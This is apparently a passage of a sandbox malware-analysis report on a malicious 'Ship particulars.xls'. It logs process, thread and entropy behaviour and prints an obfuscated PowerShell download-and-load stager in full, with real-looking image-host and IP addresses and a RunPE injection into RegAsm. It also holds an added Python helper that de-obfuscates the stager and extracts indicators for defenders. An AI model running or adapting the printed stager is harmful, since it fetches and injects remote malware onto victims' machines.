Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Ship particulars.xls Stream path 'MBD0026D144/Package' entropy: 7.9786395883 (max. 8.0)
Source: Ship particulars.xls Stream path 'Workbook' entropy: 7.99706828447 (max. 8.0)
Source: ~DFA3F86C325C272D08.TMP.0.dr Stream path 'Package' entropy: 7.9702834436 (max. 8.0)
Source: 92530000.0.dr Stream path 'MBD0026D144/Package' entropy: 7.9702834436 (max. 8.0)
Source: 92530000.0.dr Stream path 'Workbook' entropy: 7.99840003622 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 995
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2276
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3296 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 3392 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3564 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3496 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05F4 mov edx, dword ptr fs:[00000030h] 9_2_035B05F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 91.92.254.29 80
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
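The powershell.exe command line logged above is a three-layer wrapper around a short download-and-load script, and several of the report's Sigma hits (reversed commands, FromBase64String, obfuscated command line) each fire on one layer. The script is split into '+'-joined fragments; every single quote inside it is written as 8ZK and every $ as SeV so the text survives inside the outer quotes; the two chained .rEplaCE() calls put the real characters back; and the result is piped into &($pshoMe[4]+$psHome[34]+'X'), which spells ieX (Invoke-Expression) out of two letters of the $PSHOME path. The first argument handed to RunPE.Home.VAI is a URL written backwards. The Python helper below is an added example for this page, not code from the sample or from the sandbox: it evaluates those layers statically so the script can be read and its indicators extracted without ever running it, and it mirrors the stager's own marker carving on a constructed carrier. Assumptions: $PSHOME is the SysWOW64 path of the 32-bit powershell.exe seen in the report (the System32 path yields the same two letters), and SAMPLE_CARRIER is constructed, not the real new_image.jpg.

```python
"""Static de-obfuscation of the wscript.exe -> powershell.exe stager above.

Added analysis helper for this report (not code from the sample or the sandbox).
It evaluates the string tricks offline and never executes the decoded PowerShell.
"""
import base64
import re

# $PSHOME of the 32-bit PowerShell the report shows. Assumption: the stager
# indexes this path to spell its cmdlet; the System32 path gives the same letters.
PSHOME = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0"

# The -Command argument exactly as logged in the report.
COMMAND = (
    "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; "
    "SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } "
    "catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) "
    "{ SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; "
    "SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); "
    "if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; "
    "SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); "
    "SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); "
    "SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , "
    "8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }')"
    ".rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
)

# Atoms the stager builds strings from: 'literal', [char]N (optionally cast with
# [string]) and $PSHOME[N]. '+' and parentheses only join them, so concatenating
# the atoms in order is the whole evaluation.
_ATOM = re.compile(
    r"'(?P<lit>[^']*)'|(?:\[string\])?\[char\](?P<code>\d+)|\$pshome\[(?P<idx>\d+)\]",
    re.IGNORECASE,
)
_REPLACE = re.compile(r"\.replace\((?P<old>[^,]+),(?P<new>[^)]+)\)", re.IGNORECASE)


def ps_string(expr):
    """Evaluate a pure string-concatenation expression without PowerShell."""
    parts = []
    for m in _ATOM.finditer(expr):
        if m.group("lit") is not None:
            parts.append(m.group("lit"))
        elif m.group("code") is not None:
            parts.append(chr(int(m.group("code"))))
        else:
            parts.append(PSHOME[int(m.group("idx"))])
    return "".join(parts)


def deobfuscate(command):
    """Return (decoded script, name of the command it is piped into)."""
    lhs, rhs = command.rsplit("|", 1)            # (payload).Replace(..) | &(cmd)
    chain = re.search(r"\)\.replace\(", lhs, re.IGNORECASE)
    script = ps_string(lhs[: chain.start()])     # glue the '+'-split fragments
    for rep in _REPLACE.finditer(lhs[chain.start():]):
        # .NET String.Replace is ordinal and case-sensitive, like str.replace
        script = script.replace(ps_string(rep.group("old")), ps_string(rep.group("new")))
    return script, ps_string(rhs)                # rhs spells the cmdlet from $PSHOME


def extract_iocs(script):
    """Pull the stage-1 URL, the RunPE entry point and its (reversed) arguments."""
    args = re.findall(r"'([^']*)'", script.split(".Invoke(", 1)[1])
    return {
        "stage1_url": re.search(r"https?://[^\s'\"]+", script).group(0),
        "loader": re.search(r"GetType\('([^']*)'\)", script).group(1) + "."
        + re.search(r"GetMethod\('([^']*)'\)", script).group(1),
        "stage2_url": args[0][::-1],             # stored backwards in the script
        "injection_target": args[4],             # process name handed to RunPE
    }


def carve_payload(carrier, start=b"<<BASE64_START>>", end=b"<<BASE64_END>>"):
    """Mirror of the stager's own step: base64 between two markers in a 'jpg'."""
    s, e = carrier.find(start), carrier.find(end)
    if s < 0 or e <= s:
        return None
    return base64.b64decode(carrier[s + len(start):e])


# Constructed carrier, not the real download: JPEG-looking bytes around a base64
# blob where the real file carries a .NET assembly exposing RunPE.Home.VAI.
SAMPLE_CARRIER = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00 padding <<BASE64_START>>"
    + base64.b64encode(b"MZ constructed placeholder, not a real assembly")
    + b"<<BASE64_END>> trailing bytes"
)

if __name__ == "__main__":
    decoded, cmdlet = deobfuscate(COMMAND)
    print("piped into:", cmdlet)                 # ieX, i.e. Invoke-Expression
    print(decoded)
    for key, value in extract_iocs(decoded).items():
        print(key + ":", value)
    print("carved:", carve_payload(SAMPLE_CARRIER))
```

Running the file prints the readable script followed by the extracted indicators: the stage-1 URL is the image-host link whose "jpg" carries the base64 assembly between the two markers, the first VAI argument reverses into a plain http:// URL for the next stage, the three 'desativado' strings ('disabled' in Portuguese) are loader options that are switched off, and 'RegAsm' names the process a RunPE-style loader would use as its injection host. For detection, the raw command line offers tokens that survive the placeholder trick: two chained .rEplaCE( calls fed by [ChAr] casts, $pshome[ indexing in place of a cmdlet name, and the //:ptth tail of a reversed URL.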
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
[Map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]